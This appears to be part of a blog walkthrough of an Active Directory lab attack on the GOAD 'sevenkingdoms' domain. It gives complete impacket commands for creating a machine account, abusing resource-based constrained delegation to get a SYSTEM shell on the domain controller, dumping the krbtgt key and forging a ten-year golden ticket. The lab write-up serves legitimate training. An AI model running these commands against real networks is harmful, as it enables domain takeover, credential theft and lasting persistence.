In Part 1, we set the stage. Now we turn that control into dominance.
The goal here is simple. Move from a compromised machine account in the child domain north.sevenkingdoms.local to full Enterprise Admin access in the forest root sevenkingdoms.local.
Phase 0: Creating a Controlled Machine Account
Before RBCD, we need a machine account we control. By default, many domains allow authenticated users to create new computer objects (via ms-DS-MachineAccountQuota). Using Arya’s creds, we create NEEDLE-TEST$ with a known password:
python3 /usr/share/doc/python3-impacket/examples/addcomputer.py \
-computer-name 'NEEDLE-TEST$' \
-computer-pass 'Password123!' \
-dc-ip 192.168.66.11 \
'north.sevenkingdoms.local/arya.stark:Needle'
Now we can use NEEDLE-TEST$ as the controlled principal for RBCD and ticket requests.
Phase 1: Resource-Based Constrained Delegation (RBCD)
Now we abuse RBCD to let NEEDLE-TEST$ impersonate any user to the domain controller.
The objective is to allow our controlled system to impersonate any user to the domain controller.
1. Granting Delegation Rights
We modify the delegation settings so our compromised machine account can act on behalf of others when authenticating to WINTERFELL.
python3 /usr/share/doc/python3-impacket/examples/rbcd.py -delegate-to 'WINTERFELL$' -delegate-from 'NEEDLE-TEST$' -action 'write' -dc-ip 192.168.66.11 'north.sevenkingdoms.local/jon.snow:iknownothing'
At this point, WINTERFELL trusts a system we control.
2. Impersonating the Administrator
Next, we use S4U2Proxy to request a service ticket for the CIFS service on WINTERFELL, impersonating the Domain Administrator.
python3 /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/WINTERFELL.north.sevenkingdoms.local' -impersonate Administrator -dc-ip 192.168.66.11 north/NEEDLE-TEST$:Password123!
We now hold a valid Kerberos service ticket as Administrator.
3. Gaining a SYSTEM Shell
We load the ticket and use it to execute remotely.
export KRB5CCNAME=Administrator.ccache
python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass NORTH.SEVENKINGDOMS.LOCAL/Administrator@winterfell.north.sevenkingdoms.local
This drops us into a SYSTEM shell on the domain controller.
Phase 2: Domain Persistence (Golden Ticket)
Privilege is not enough. We want persistence.
From the domain controller, we extract the krbtgt account keys. Modern environments require the AES key, not RC4.
1. Extracting the KRBTGT Keys
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -k -no-pass -just-dc north.sevenkingdoms.local/administrator@winterfell.north.sevenkingdoms.local | grep krbtgt
We extract the AES256 key for krbtgt. This lets us mint long-lived tickets for the domain.
2. Forging the 10-Year Golden Ticket
Using the krbtgt AES key and the domain SID, we forge a long-lived Kerberos ticket.
python3 /usr/share/doc/python3-impacket/examples/ticketer.py -aesKey c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e -domain-sid S-1-5-21-3995002436-1582307507-150598601 -domain north.sevenkingdoms.local -user-id 500 Administrator
Expiration is no longer relevant. Password changes do not matter.
The domain is persistent.
We verify access by interacting with the DC over SMB.
python3 smbclient.py -k -no-pass winterfell.north.sevenkingdoms.local
0 Comments